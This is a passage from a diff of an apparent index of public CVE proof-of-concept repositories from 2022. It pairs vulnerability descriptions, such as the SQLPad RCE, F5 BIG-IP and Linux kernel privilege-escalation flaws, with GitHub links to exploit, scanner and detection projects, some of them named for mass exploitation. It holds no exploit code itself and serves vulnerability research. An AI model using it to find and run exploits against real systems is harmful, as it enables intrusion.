(2022-03-11) + +A flaw was found in JBoss-client. The vulnerability occurs due to a memory leak on the JBoss client-side, when using UserTransaction repeatedly and leads to information leakage vulnerability. + + +- [ByteHackr/CVE-2022-0853](https://github.com/ByteHackr/CVE-2022-0853) ### CVE-2022-0918 (2022-03-16) @@ -118,6 +16898,36 @@ - [NathanMulbrook/CVE-2022-0918](https://github.com/NathanMulbrook/CVE-2022-0918) +### CVE-2022-0944 (2022-03-15) + +Template injection in connection test endpoint leads to RCE in GitHub repository sqlpad/sqlpad prior to 6.10.1. + + +- [shhrew/CVE-2022-0944](https://github.com/shhrew/CVE-2022-0944) +- [Philip-Otter/CVE-2022-0944_RCE_Automation](https://github.com/Philip-Otter/CVE-2022-0944_RCE_Automation) +- [FlojBoj/CVE-2022-0944](https://github.com/FlojBoj/CVE-2022-0944) +- [0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944](https://github.com/0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944) +- [Robocopsita/CVE-2022-0944_RCE_POC](https://github.com/Robocopsita/CVE-2022-0944_RCE_POC) +- [toneillcodes/CVE-2022-0944](https://github.com/toneillcodes/CVE-2022-0944) +- [LipeOzyy/SQLPad-RCE-Exploit-CVE-2022-0944](https://github.com/LipeOzyy/SQLPad-RCE-Exploit-CVE-2022-0944) +- [0xDTC/SQLPad-6.10.0-Exploit-CVE-2022-0944](https://github.com/0xDTC/SQLPad-6.10.0-Exploit-CVE-2022-0944) + +### CVE-2022-0952 (2022-05-02) + +The Sitemap by click5 WordPress plugin before 1.0.36 does not have authorisation and CSRF checks when updating options via a REST endpoint, and does not ensure that the option to be updated belongs to the plugin. As a result, unauthenticated attackers could change arbitrary blog options, such as the users_can_register and default_role, allowing them to create a new admin account and take over the blog. + + +- [RandomRobbieBF/CVE-2022-0952](https://github.com/RandomRobbieBF/CVE-2022-0952) + +### CVE-2022-0995 (2022-03-25) + +An out-of-bounds (OOB) memory write flaw was found in the Linux kernel’s watch_queue event notification subsystem. This flaw can overwrite parts of the kernel state, potentially allowing a local user to gain privileged access or cause a denial of service on the system. + + +- [Bonfee/CVE-2022-0995](https://github.com/Bonfee/CVE-2022-0995) +- [AndreevSemen/CVE-2022-0995](https://github.com/AndreevSemen/CVE-2022-0995) +- [1nzag/CVE-2022-0995](https://github.com/1nzag/CVE-2022-0995) + ### CVE-2022-0997 (2022-05-17) Improper file permissions in the CommandPost, Collector, and Sensor components of Fidelis Network and Deception enables an attacker with local, administrative access to the CLI to modify affected script files, which could result in arbitrary commands being run as root upon subsequent logon by a root user. The vulnerability is present in Fidelis Network and Deception versions prior to 9.4.5. Patches and updates are available to address this vulnerability. @@ -125,12 +16935,44 @@ - [henryreed/CVE-2022-0997](https://github.com/henryreed/CVE-2022-0997) +### CVE-2022-1011 (2022-03-18) + +A use-after-free flaw was found in the Linux kernel’s FUSE filesystem in the way a user triggers write(). This flaw allows a local user to gain unauthorized access to data from the FUSE filesystem, resulting in privilege escalation. + + +- [xkaneiki/CVE-2022-1011](https://github.com/xkaneiki/CVE-2022-1011) + +### CVE-2022-1012 (2022-08-05) + +A memory leak problem was found in the TCP source port generation algorithm in net/ipv4/tcp.c due to the small table perturb size. This flaw may allow an attacker to information leak and may cause a denial of service problem. + + +- [nanopathi/Linux-4.19.72_CVE-2022-1012](https://github.com/nanopathi/Linux-4.19.72_CVE-2022-1012) + ### CVE-2022-1015 (2022-04-29) A flaw was found in the Linux kernel in linux/net/netfilter/nf_tables_api.c of the netfilter subsystem. This flaw allows a local user to cause an out-of-bounds write issue. +- [pqlx/CVE-2022-1015](https://github.com/pqlx/CVE-2022-1015) - [zanezhub/CVE-2022-1015-1016](https://github.com/zanezhub/CVE-2022-1015-1016) +- [shuttterman/bob_kern_exp1](https://github.com/shuttterman/bob_kern_exp1) +- [ysanatomic/CVE-2022-1015](https://github.com/ysanatomic/CVE-2022-1015) +- [wlswotmd/CVE-2022-1015](https://github.com/wlswotmd/CVE-2022-1015) +- [delsploit/CVE-2022-1015](https://github.com/delsploit/CVE-2022-1015) +- [pivik271/CVE-2022-1015](https://github.com/pivik271/CVE-2022-1015) +- [more-kohii/CVE-2022-1015](https://github.com/more-kohii/CVE-2022-1015) +- [0range1337/CVE-2022-1015](https://github.com/0range1337/CVE-2022-1015) +- [seadragnol/CVE-2022-1015](https://github.com/seadragnol/CVE-2022-1015) + +### CVE-2022-1026 (2022-04-04) + +Kyocera multifunction printers running vulnerable versions of Net View unintentionally expose sensitive user information, including usernames and passwords, through an insufficiently protected address book export function. + + +- [ac3lives/kyocera-cve-2022-1026](https://github.com/ac3lives/kyocera-cve-2022-1026) +- [flamebarke/nmap-printer-nse-scripts](https://github.com/flamebarke/nmap-printer-nse-scripts) +- [r0lh/kygocera](https://github.com/r0lh/kygocera) ### CVE-2022-1040 (2022-03-25) @@ -138,6 +16980,12 @@ - [killvxk/CVE-2022-1040](https://github.com/killvxk/CVE-2022-1040) +- [jam620/Sophos-Vulnerability](https://github.com/jam620/Sophos-Vulnerability) +- [Keith-amateur/cve-2022-1040](https://github.com/Keith-amateur/cve-2022-1040) +- [jackson5sec/CVE-2022-1040](https://github.com/jackson5sec/CVE-2022-1040) +- [michealadams30/CVE-2022-1040](https://github.com/michealadams30/CVE-2022-1040) +- [Cyb3rEnthusiast/CVE-2022-1040](https://github.com/Cyb3rEnthusiast/CVE-2022-1040) +- [xMr110/CVE-2022-1040](https://github.com/xMr110/CVE-2022-1040) ### CVE-2022-1051 (2022-05-16) @@ -146,6 +16994,13 @@ - [V35HR4J/CVE-2022-1051](https://github.com/V35HR4J/CVE-2022-1051) +### CVE-2022-1068 (2022-04-01) + +Modbus Tools Modbus Slave (versions 7.4.2 and prior) is vulnerable to a stack-based buffer overflow in the registration field. This may cause the program to crash when a long character string is used. + + +- [webraybtl/CVE-2022-1068](https://github.com/webraybtl/CVE-2022-1068) + ### CVE-2022-1077 (2022-03-29) A vulnerability was found in TEM FLEX-1080 and FLEX-1085 1.6.0. It has been declared as problematic. This vulnerability log.cgi of the component Log Handler. A direct request leads to information disclosure of hardware information. The attack can be initiated remotely and does not require any form of authentication. @@ -153,12 +17008,27 @@ - [brosck/CVE-2022-1077](https://github.com/brosck/CVE-2022-1077) +### CVE-2022-1096 (2022-07-22) + +Type confusion in V8 in Google Chrome prior to 99.0.4844.84 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. + + +- [Mav3r1ck0x1/Chrome-and-Edge-Version-Dumper](https://github.com/Mav3r1ck0x1/Chrome-and-Edge-Version-Dumper) + +### CVE-2022-1119 (2022-04-19) + +The Simple File List WordPress plugin is vulnerable to Arbitrary File Download via the eeFile parameter found in the ~/includes/ee-downloader.php file due to missing controls which makes it possible unauthenticated attackers to supply a path to a file that will subsequently be downloaded, in versions up to and including 3.2.7. + + +- [z92g/CVE-2022-1119](https://github.com/z92g/CVE-2022-1119) + ### CVE-2022-1162 (2022-04-04) A hardcoded password was set for accounts registered using an OmniAuth provider (e.g. OAuth, LDAP, SAML) in GitLab CE/EE versions 14.7 prior to 14.7.7, 14.8 prior to 14.8.5, and 14.9 prior to 14.9.2 allowing attackers to potentially take over accounts - [Greenwolf/CVE-2022-1162](https://github.com/Greenwolf/CVE-2022-1162) +- [ipsBruno/CVE-2022-1162](https://github.com/ipsBruno/CVE-2022-1162) ### CVE-2022-1175 (2022-04-04) @@ -167,6 +17037,20 @@ - [Greenwolf/CVE-2022-1175](https://github.com/Greenwolf/CVE-2022-1175) +### CVE-2022-1203 (2022-05-30) + +The Content Mask WordPress plugin before 1.8.4.1 does not have authorisation and CSRF checks in various AJAX actions, as well as does not validate the option to be updated to ensure it belongs to the plugin. As a result, any authenticated user, such as subscriber could modify arbitrary blog options + + +- [RandomRobbieBF/CVE-2022-1203](https://github.com/RandomRobbieBF/CVE-2022-1203) + +### CVE-2022-1227 (2022-04-29) + +A privilege escalation flaw was found in Podman. This flaw allows an attacker to publish a malicious image to a public registry. Once this image is downloaded by a potential victim, the vulnerability is triggered after a user runs the 'podman top' command. This action gives the attacker access to the host filesystem, leading to information disclosure or denial of service. + + +- [iridium-soda/CVE-2022-1227_Exploit](https://github.com/iridium-soda/CVE-2022-1227_Exploit) + ### CVE-2022-1292 (2022-05-03) The c_rehash script does not properly sanitise shell metacharacters to prevent command injection. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.3 (Affected 3.0.0,3.0.1,3.0.2). Fixed in OpenSSL 1.1.1o (Affected 1.1.1-1.1.1n). Fixed in OpenSSL 1.0.2ze (Affected 1.0.2-1.0.2zd). @@ -175,6 +17059,8 @@ - [li8u99/CVE-2022-1292](https://github.com/li8u99/CVE-2022-1292) - [alcaparra/CVE-2022-1292](https://github.com/alcaparra/CVE-2022-1292) - [rama291041610/CVE-2022-1292](https://github.com/rama291041610/CVE-2022-1292) +- [greek0x0/CVE-2022-1292](https://github.com/greek0x0/CVE-2022-1292) +- [und3sc0n0c1d0/CVE-2022-1292](https://github.com/und3sc0n0c1d0/CVE-2022-1292) ### CVE-2022-1329 (2022-04-19) @@ -184,6 +17070,27 @@ - [AkuCyberSec/CVE-2022-1329-WordPress-Elementor-3.6.0-3.6.1-3.6.2-Remote-Code-Execution-Exploit](https://github.com/AkuCyberSec/CVE-2022-1329-WordPress-Elementor-3.6.0-3.6.1-3.6.2-Remote-Code-Execution-Exploit) - [mcdulltii/CVE-2022-1329](https://github.com/mcdulltii/CVE-2022-1329) - [Grazee/CVE-2022-1329-WordPress-Elementor-RCE](https://github.com/Grazee/CVE-2022-1329-WordPress-Elementor-RCE) +- [dexit/CVE-2022-1329](https://github.com/dexit/CVE-2022-1329) +- [phanthibichtram12/CVE-2022-1329](https://github.com/phanthibichtram12/CVE-2022-1329) +- [AgustinESI/CVE-2022-1329](https://github.com/AgustinESI/CVE-2022-1329) + +### CVE-2022-1364 (2022-07-26) + +Type confusion in V8 Turbofan in Google Chrome prior to 100.0.4896.127 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. + + +- [A1Lin/cve-2022-1364](https://github.com/A1Lin/cve-2022-1364) + +### CVE-2022-1386 (2022-05-16) + +The Fusion Builder WordPress plugin before 3.6.2, used in the Avada theme, does not validate a parameter in its forms which could be used to initiate arbitrary HTTP requests. The data returned is then reflected back in the application's response. This could be used to interact with hosts on the server's local network bypassing firewalls and access control measures. + + +- [ardzz/CVE-2022-1386](https://github.com/ardzz/CVE-2022-1386) +- [im-hanzou/fubucker](https://github.com/im-hanzou/fubucker) +- [zycoder0day/CVE-2022-1386-Mass_Vulnerability](https://github.com/zycoder0day/CVE-2022-1386-Mass_Vulnerability) +- [satyasai1460/CVE-2022-1386](https://github.com/satyasai1460/CVE-2022-1386) +- [lamcodeofpwnosec/CVE-2022-1386](https://github.com/lamcodeofpwnosec/CVE-2022-1386) ### CVE-2022-1388 (2022-05-05) @@ -239,6 +17146,52 @@ - [Chocapikk/CVE-2022-1388](https://github.com/Chocapikk/CVE-2022-1388) - [li8u99/CVE-2022-1388](https://github.com/li8u99/CVE-2022-1388) - [electr0lulz/Mass-CVE-2022-1388](https://github.com/electr0lulz/Mass-CVE-2022-1388) +- [Luchoane/CVE-2022-1388_refresh](https://github.com/Luchoane/CVE-2022-1388_refresh) +- [jbharucha05/CVE-2022-1388](https://github.com/jbharucha05/CVE-2022-1388) +- [On-Cyber-War/CVE-2022-1388](https://github.com/On-Cyber-War/CVE-2022-1388) +- [forktheplanet/CVE-2022-1388](https://github.com/forktheplanet/CVE-2022-1388) +- [revanmalang/CVE-2022-1388](https://github.com/revanmalang/CVE-2022-1388) +- [amitlttwo/CVE-2022-1388](https://github.com/amitlttwo/CVE-2022-1388) +- [M4fiaB0y/CVE-2022-1388](https://github.com/M4fiaB0y/CVE-2022-1388) +- [devengpk/CVE-2022-1388](https://github.com/devengpk/CVE-2022-1388) +- [vaelwolf/CVE-2022-1388](https://github.com/vaelwolf/CVE-2022-1388) +- [j-baines/tippa-my-tongue](https://github.com/j-baines/tippa-my-tongue) +- [SudeepaShiranthaka/F5-BIG-IP-Remote-Code-Execution-Vulnerability-CVE-2022-1388-A-Case-Study](https://github.com/SudeepaShiranthaka/F5-BIG-IP-Remote-Code-Execution-Vulnerability-CVE-2022-1388-A-Case-Study) +- [battleofthebots/refresh](https://github.com/battleofthebots/refresh) +- [nvk0x/CVE-2022-1388-exploit](https://github.com/nvk0x/CVE-2022-1388-exploit) +- [nico989/CVE-2022-1388](https://github.com/nico989/CVE-2022-1388) +- [gotr00t0day/CVE-2022-1388](https://github.com/gotr00t0day/CVE-2022-1388) +- [impost0r/CVE-2022-1388](https://github.com/impost0r/CVE-2022-1388) +- [XiaomingX/cve-2022-1388-poc](https://github.com/XiaomingX/cve-2022-1388-poc) + +### CVE-2022-1421 (2022-06-06) + +The Discy WordPress theme before 5.2 lacks CSRF checks in some AJAX actions, allowing an attacker to make a logged in admin change arbitrary 's settings including payment methods via a CSRF attack + + +- [nb1b3k/CVE-2022-1421](https://github.com/nb1b3k/CVE-2022-1421) + +### CVE-2022-1442 (2022-05-10) + +The Metform WordPress plugin is vulnerable to sensitive information disclosure due to improper access control in the ~/core/forms/action.php file which can be exploited by an unauthenticated attacker to view all API keys and secrets of integrated third-party APIs like that of PayPal, Stripe, Mailchimp, Hubspot, HelpScout, reCAPTCHA and many more, in versions up to and including 2.1.3. + + +- [RandomRobbieBF/CVE-2022-1442](https://github.com/RandomRobbieBF/CVE-2022-1442) + +### CVE-2022-1471 (2022-12-01) + +SnakeYaml's Constructor() class does not restrict types which can be instantiated during deserialization. Deserializing yaml content provided by an attacker can lead to remote code execution. We recommend using SnakeYaml's SafeConsturctor when parsing untrusted content to restrict deserialization. We recommend upgrading to version 2.0 and beyond.\n + + +- [1fabunicorn/SnakeYAML-CVE-2022-1471-POC](https://github.com/1fabunicorn/SnakeYAML-CVE-2022-1471-POC) +- [falconkei/snakeyaml_cve_poc](https://github.com/falconkei/snakeyaml_cve_poc) + +### CVE-2022-1565 (2022-07-18) + +The plugin WP All Import is vulnerable to arbitrary file uploads due to missing file type validation via the wp_all_import_get_gz.php file in versions up to, and including, 3.6.7. This makes it possible for authenticated attackers, with administrator level permissions and above, to upload arbitrary files on the affected sites server which may make remote code execution possible. + + +- [phanthibichtram12/CVE-2022-1565](https://github.com/phanthibichtram12/CVE-2022-1565) ### CVE-2022-1597 (2022-06-06) @@ -262,6 +17215,22 @@ - [savior-only/CVE-2022-1609](https://github.com/savior-only/CVE-2022-1609) - [0xSojalSec/CVE-2022-1609](https://github.com/0xSojalSec/CVE-2022-1609) - [0xSojalSec/-CVE-2022-1609](https://github.com/0xSojalSec/-CVE-2022-1609) +- [w4r3s/cve-2022-1609-exploit](https://github.com/w4r3s/cve-2022-1609-exploit) + +### CVE-2022-1679 (2022-05-16) + +A use-after-free flaw was found in the Linux kernel’s Atheros wireless adapter driver in the way a user forces the ath9k_htc_wait_for_target function to fail with some input messages. This flaw allows a local user to crash or potentially escalate their privileges on the system. + + +- [EkamSinghWalia/-Detection-and-Mitigation-for-CVE-2022-1679](https://github.com/EkamSinghWalia/-Detection-and-Mitigation-for-CVE-2022-1679) +- [ov3rwatch/Detection-and-Mitigation-for-CVE-2022-1679](https://github.com/ov3rwatch/Detection-and-Mitigation-for-CVE-2022-1679) + +### CVE-2022-1802 (2022-12-22) + +If an attacker was able to corrupt the methods of an Array object in JavaScript via prototype pollution, they could have achieved execution of attacker-controlled JavaScript code in a privileged context. This vulnerability affects Firefox ESR < 91.9.1, Firefox < 100.0.2, Firefox for Android < 100.3.0, and Thunderbird < 91.9.1. + + +- [mistymntncop/CVE-2022-1802](https://github.com/mistymntncop/CVE-2022-1802) ### CVE-2022-1903 (2022-06-27) @@ -276,6 +17245,40 @@ ### CVE-2022-1972 - [randorisec/CVE-2022-1972-infoleak-PoC](https://github.com/randorisec/CVE-2022-1972-infoleak-PoC) +### CVE-2022-2078 (2022-06-30) + +A vulnerability was found in the Linux kernel's nft_set_desc_concat_parse() function .This flaw allows an attacker to trigger a buffer overflow via nft_set_desc_concat_parse() , causing a denial of service and possibly to run code. + + +- [delsploit/CVE-2022-2078](https://github.com/delsploit/CVE-2022-2078) + +### CVE-2022-2097 (2022-07-05) + +AES OCB mode for 32-bit x86 platforms using the AES-NI assembly optimised implementation will not encrypt the entirety of the data under some circumstances. This could reveal sixteen bytes of data that was preexisting in the memory that wasn't written. In the special case of "in place" encryption, sixteen bytes of the plaintext would be revealed. Since OpenSSL does not support OCB based cipher suites for TLS and DTLS, they are both unaffected. Fixed in OpenSSL 3.0.5 (Affected 3.0.0-3.0.4). Fixed in OpenSSL 1.1.1q (Affected 1.1.1-1.1.1p). + + +- [PeterThomasAwen/OpenSSLUpgrade1.1.1q-Ubuntu](https://github.com/PeterThomasAwen/OpenSSLUpgrade1.1.1q-Ubuntu) + +### CVE-2022-2109 +- [Vulnmachines/oracle-weblogic-CVE-2021-2109](https://github.com/Vulnmachines/oracle-weblogic-CVE-2021-2109) + +### CVE-2022-2185 (2022-07-01) + +A critical issue has been discovered in GitLab affecting all versions starting from 14.0 prior to 14.10.5, 15.0 prior to 15.0.4, and 15.1 prior to 15.1.1 where an authenticated user authorized to import projects could import a maliciously crafted project leading to remote code execution. + + +- [safe3s/CVE-2022-2185-poc](https://github.com/safe3s/CVE-2022-2185-poc) +- [ESUAdmin/CVE-2022-2185](https://github.com/ESUAdmin/CVE-2022-2185) + +### CVE-2022-2274 (2022-07-01) + +The OpenSSL 3.0.4 release introduced a serious bug in the RSA implementation for X86_64 CPUs supporting the AVX512IFMA instructions. This issue makes the RSA implementation with 2048 bit private keys incorrect on such machines and memory corruption will happen during the computation. As a consequence of the memory corruption an attacker may be able to trigger a remote code execution on the machine performing the computation. SSL/TLS servers or other servers using 2048 bit RSA private keys running on machines supporting AVX512IFMA instructions of the X86_64 architecture are affected by this issue. + + +- [Malwareman007/CVE-2022-2274](https://github.com/Malwareman007/CVE-2022-2274) +- [EkamSinghWalia/OpenSSL-Vulnerability-Detection-Script](https://github.com/EkamSinghWalia/OpenSSL-Vulnerability-Detection-Script) +- [DesmondSanctity/CVE-2022-2274](https://github.com/DesmondSanctity/CVE-2022-2274) + ### CVE-2022-2333 (2022-09-16) If an attacker manages to trick a valid user into loading a malicious DLL, the attacker may be able to achieve code execution in Honeywell SoftMaster version 4.51 application’s context and permissions. @@ -283,12 +17286,378 @@ - [shirouQwQ/CVE-2022-2333](https://github.com/shirouQwQ/CVE-2022-2333) +### CVE-2022-2414 (2022-07-29) + +Access to external entities when parsing XML documents can lead to XML external entity (XXE) attacks. This flaw allows a remote attacker to potentially retrieve the content of arbitrary files by sending specially crafted HTTP requests. + + +- [superhac/CVE-2022-2414-POC](https://github.com/superhac/CVE-2022-2414-POC) +- [amitlttwo/CVE-2022-2414-Proof-Of-Concept](https://github.com/amitlttwo/CVE-2022-2414-Proof-Of-Concept) +- [satyasai1460/CVE-2022-2414](https://github.com/satyasai1460/CVE-2022-2414) +- [geniuszly/CVE-2022-2414](https://github.com/geniuszly/CVE-2022-2414) + +### CVE-2022-2466 (2022-08-31) + +It was found that Quarkus 2.10.x does not terminate HTTP requests header context which may lead to unpredictable behavior. + + +- [yuxblank/CVE-2022-2466---Request-Context-not-terminated-with-GraphQL](https://github.com/yuxblank/CVE-2022-2466---Request-Context-not-terminated-with-GraphQL) + +### CVE-2022-2546 (2023-02-02) + +The All-in-One WP Migration WordPress plugin before 7.63 uses the wrong content type, and does not properly escape the response from the ai1wm_export AJAX action, allowing an attacker to craft a request that when submitted by any visitor will inject arbitrary html or javascript into the response that will be executed in the victims session. Note: This requires knowledge of a static secret key + + +- [OpenXP-Research/CVE-2022-2546](https://github.com/OpenXP-Research/CVE-2022-2546) + +### CVE-2022-2586 (2024-01-08) + +It was discovered that a nft object or expression could reference a nft set on a different nft table, leading to a use-after-free once that table was deleted. + + +- [aels/CVE-2022-2586-LPE](https://github.com/aels/CVE-2022-2586-LPE) +- [sniper404ghostxploit/CVE-2022-2586](https://github.com/sniper404ghostxploit/CVE-2022-2586) + +### CVE-2022-2588 (2024-01-08) + +It was discovered that the cls_route filter implementation in the Linux kernel would not remove an old filter from the hashtable before freeing it if its handle had the value 0. + + +- [Markakd/CVE-2022-2588](https://github.com/Markakd/CVE-2022-2588) +- [ASkyeye/2022-LPE-UAF](https://github.com/ASkyeye/2022-LPE-UAF) +- [pirenga/2022-LPE-UAF](https://github.com/pirenga/2022-LPE-UAF) +- [konoha279/2022-LPE-UAF](https://github.com/konoha279/2022-LPE-UAF) +- [PolymorphicOpcode/CVE-2022-2588](https://github.com/PolymorphicOpcode/CVE-2022-2588) +- [BassamGraini/CVE-2022-2588](https://github.com/BassamGraini/CVE-2022-2588) +- [veritas501/CVE-2022-2588](https://github.com/veritas501/CVE-2022-2588) +- [dom4570/CVE-2022-2588](https://github.com/dom4570/CVE-2022-2588) + +### CVE-2022-2590 (2022-08-31) + +A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only shared memory mappings. This flaw allows an unprivileged, local user to gain write access to read-only memory mappings, increasing their privileges on the system. + + +- [hyeonjun17/CVE-2022-2590-analysis](https://github.com/hyeonjun17/CVE-2022-2590-analysis) + +### CVE-2022-2602 (2024-01-08) + +io_uring UAF, Unix SCM garbage collection + + +- [LukeGix/CVE-2022-2602](https://github.com/LukeGix/CVE-2022-2602) +- [kiks7/CVE-2022-2602-Kernel-Exploit](https://github.com/kiks7/CVE-2022-2602-Kernel-Exploit) +- [th3-5had0w/CVE-2022-2602-Study](https://github.com/th3-5had0w/CVE-2022-2602-Study) + +### CVE-2022-2639 (2022-09-01) + +An integer coercion error was found in the openvswitch kernel module. Given a sufficiently large number of actions, while copying and reserving memory for a new action of a new flow, the reserve_sfa_size() function does not return -EMSGSIZE as expected, potentially leading to an out-of-bounds write access. This flaw allows a local user to crash or potentially escalate their privileges on the system. + + +- [bb33bb/CVE-2022-2639-PipeVersion](https://github.com/bb33bb/CVE-2022-2639-PipeVersion) +- [EkamSinghWalia/Detection-and-Mitigation-for-CVE-2022-2639](https://github.com/EkamSinghWalia/Detection-and-Mitigation-for-CVE-2022-2639) +- [letsr00t/-2022-LOCALROOT-CVE-2022-2639](https://github.com/letsr00t/-2022-LOCALROOT-CVE-2022-2639) +- [devetop/CVE-2022-2639-PipeVersion](https://github.com/devetop/CVE-2022-2639-PipeVersion) + +### CVE-2022-2884 (2022-10-17) + +A vulnerability in GitLab CE/EE affecting all versions from 11.3.4 prior to 15.1.5, 15.2 to 15.2.3, 15.3 to 15.3 to 15.3.1 allows an an authenticated user to achieve remote code execution via the Import from GitHub API endpoint + + +- [m3ssap0/gitlab_rce_cve-2022-2884](https://github.com/m3ssap0/gitlab_rce_cve-2022-2884) + +### CVE-2022-2992 (2022-10-17) + +A vulnerability in GitLab CE/EE affecting all versions from 11.10 prior to 15.1.6, 15.2 to 15.2.4, 15.3 to 15.3.2 allows an authenticated user to achieve remote code execution via the Import from GitHub API endpoint. + + +- [CsEnox/CVE-2022-2992](https://github.com/CsEnox/CVE-2022-2992) +- [Malwareman007/CVE-2022-2992](https://github.com/Malwareman007/CVE-2022-2992) + +### CVE-2022-3168 +- [irsl/CVE-2022-3168-adb-unexpected-reverse-forwards](https://github.com/irsl/CVE-2022-3168-adb-unexpected-reverse-forwards) + +### CVE-2022-3172 (2023-11-03) + +A security issue was discovered in kube-apiserver that allows an \naggregated API server to redirect client traffic to any URL. This could\n lead to the client performing unexpected actions as well as forwarding \nthe client's API server credentials to third parties.\n + + +- [UgOrange/CVE-2022-3172](https://github.com/UgOrange/CVE-2022-3172) + +### CVE-2022-3317 (2022-11-01) + +Insufficient validation of untrusted input in Intents in Google Chrome on Android prior to 106.0.5249.62 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Low) + + +- [hfh86/CVE-2022-3317](https://github.com/hfh86/CVE-2022-3317) + +### CVE-2022-3328 (2024-01-08) + +Race condition in snap-confine's must_mkdir_and_open_with_perms() + + +- [Mr-xn/CVE-2022-3328](https://github.com/Mr-xn/CVE-2022-3328) + +### CVE-2022-3357 (2022-10-31) + +The Smart Slider 3 WordPress plugin before 3.5.1.11 unserialises the content of an imported file, which could lead to PHP object injection issues when a user import (intentionally or not) a malicious file, and a suitable gadget chain is present on the site. + + +- [iamz24/CVE-2021-3493_CVE-2022-3357](https://github.com/iamz24/CVE-2021-3493_CVE-2022-3357) + +### CVE-2022-3368 (2022-10-17) + +A vulnerability within the Software Updater functionality of Avira Security for Windows allowed an attacker with write access to the filesystem, to escalate his privileges in certain scenarios. The issue was fixed with Avira Security version 1.1.72.30556. + + +- [Wh04m1001/CVE-2022-3368](https://github.com/Wh04m1001/CVE-2022-3368) +- [byt3n33dl3/CrackAVFee](https://github.com/byt3n33dl3/CrackAVFee) + +### CVE-2022-3464 (2022-10-12) + +A vulnerability classified as problematic has been found in puppyCMS up to 5.1. This affects an unknown part of the file /admin/settings.php. The manipulation of the argument site_name leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-210699. + + +- [GYLQ/CVE-2022-3464](https://github.com/GYLQ/CVE-2022-3464) + +### CVE-2022-3518 (2022-10-15) + +A vulnerability classified as problematic has been found in SourceCodester Sanitization Management System 1.0. Affected is an unknown function of the component User Creation Handler. The manipulation of the argument First Name/Middle Name/Last Name leads to cross site scripting. It is possible to launch the attack remotely. VDB-211014 is the identifier assigned to this vulnerability. + + +- [lohith19/CVE-2022-3518](https://github.com/lohith19/CVE-2022-3518) + +### CVE-2022-3546 (2022-10-17) + +A vulnerability was found in SourceCodester Simple Cold Storage Management System 1.0 and classified as problematic. Affected by this issue is some unknown functionality of the file /csms/admin/?page=user/list of the component Create User Handler. The manipulation of the argument First Name/Last Name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-211046 is the identifier assigned to this vulnerability. + + +- [thehackingverse/CVE-2022-3546](https://github.com/thehackingverse/CVE-2022-3546) + +### CVE-2022-3552 (2022-10-17) + +Unrestricted Upload of File with Dangerous Type in GitHub repository boxbilling/boxbilling prior to 0.0.1. + + +- [0xk4b1r/CVE-2022-3552](https://github.com/0xk4b1r/CVE-2022-3552) + +### CVE-2022-3564 (2022-10-17) + +A vulnerability classified as critical was found in Linux Kernel. Affected by this vulnerability is the function l2cap_reassemble_sdu of the file net/bluetooth/l2cap_core.c of the component Bluetooth. The manipulation leads to use after free. It is recommended to apply a patch to fix this issue. The associated identifier of this vulnerability is VDB-211087. + + +- [Trinadh465/linux-4.1.15_CVE-2022-3564](https://github.com/Trinadh465/linux-4.1.15_CVE-2022-3564) + +### CVE-2022-3590 (2022-12-14) + +WordPress is affected by an unauthenticated blind SSRF in the pingback feature. Because of a TOCTOU race condition between the validation checks and the HTTP request, attackers can reach internal hosts that are explicitly forbidden. + + +- [hxlxmjxbbxs/CVE-2022-3590-WordPress-Vulnerability-Scanner](https://github.com/hxlxmjxbbxs/CVE-2022-3590-WordPress-Vulnerability-Scanner) +- [huynhvanphuc/CVE-2022-3590-WordPress-Vulnerability-Scanner](https://github.com/huynhvanphuc/CVE-2022-3590-WordPress-Vulnerability-Scanner) + +### CVE-2022-3602 (2022-11-01) + +A buffer overrun can be triggered in X.509 certificate verification, specifically in name constraint checking. Note that this occurs after certificate chain signature verification and requires either a CA to have signed the malicious certificate or for the application to continue certificate verification despite failure to construct a path to a trusted issuer. An attacker can craft a malicious email address to overflow four attacker-controlled bytes on the stack. This buffer overflow could result in a crash (causing a denial of service) or potentially remote code execution. Many platforms implement stack overflow protections which would mitigate against the risk of remote code execution. The risk may be further mitigated based on stack layout for any given platform/compiler. Pre-announcements of CVE-2022-3602 described this issue as CRITICAL. Further analysis based on some of the mitigating factors described above have led this to be downgraded to HIGH. Users are still encouraged to upgrade to a new version as soon as possible. In a TLS client, this can be triggered by connecting to a malicious server. In a TLS server, this can be triggered if the server requests client authentication and a malicious client connects. Fixed in OpenSSL 3.0.7 (Affected 3.0.0,3.0.1,3.0.2,3.0.3,3.0.4,3.0.5,3.0.6). + + +- [NCSC-NL/OpenSSL-2022](https://github.com/NCSC-NL/OpenSSL-2022) +- [colmmacc/CVE-2022-3602](https://github.com/colmmacc/CVE-2022-3602) +- [eatscrayon/CVE-2022-3602-poc](https://github.com/eatscrayon/CVE-2022-3602-poc) +- [attilaszia/cve-2022-3602](https://github.com/attilaszia/cve-2022-3602) +- [alicangnll/SpookySSL-Scanner](https://github.com/alicangnll/SpookySSL-Scanner) +- [rbowes-r7/cve-2022-3602-and-cve-2022-3786-openssl-poc](https://github.com/rbowes-r7/cve-2022-3602-and-cve-2022-3786-openssl-poc) +- [corelight/CVE-2022-3602](https://github.com/corelight/CVE-2022-3602) +- [cybersecurityworks553/CVE-2022-3602-and-CVE-2022-3786](https://github.com/cybersecurityworks553/CVE-2022-3602-and-CVE-2022-3786) + +### CVE-2022-3656 (2022-11-01) + +Insufficient data validation in File System in Google Chrome prior to 107.0.5304.62 allowed a remote attacker to bypass file system restrictions via a crafted HTML page. (Chromium security severity: Medium) + + +- [momika233/CVE-2022-3656](https://github.com/momika233/CVE-2022-3656) + +### CVE-2022-3699 (2023-10-24) + +\nA privilege escalation vulnerability was reported in the Lenovo HardwareScanPlugin prior to version 1.3.1.2 and Lenovo Diagnostics prior to version 4.45\n\n\n\n that could allow a local user to execute code with elevated privileges. + + +- [alfarom256/CVE-2022-3699](https://github.com/alfarom256/CVE-2022-3699) +- [estimated1337/lenovo_exec](https://github.com/estimated1337/lenovo_exec) +- 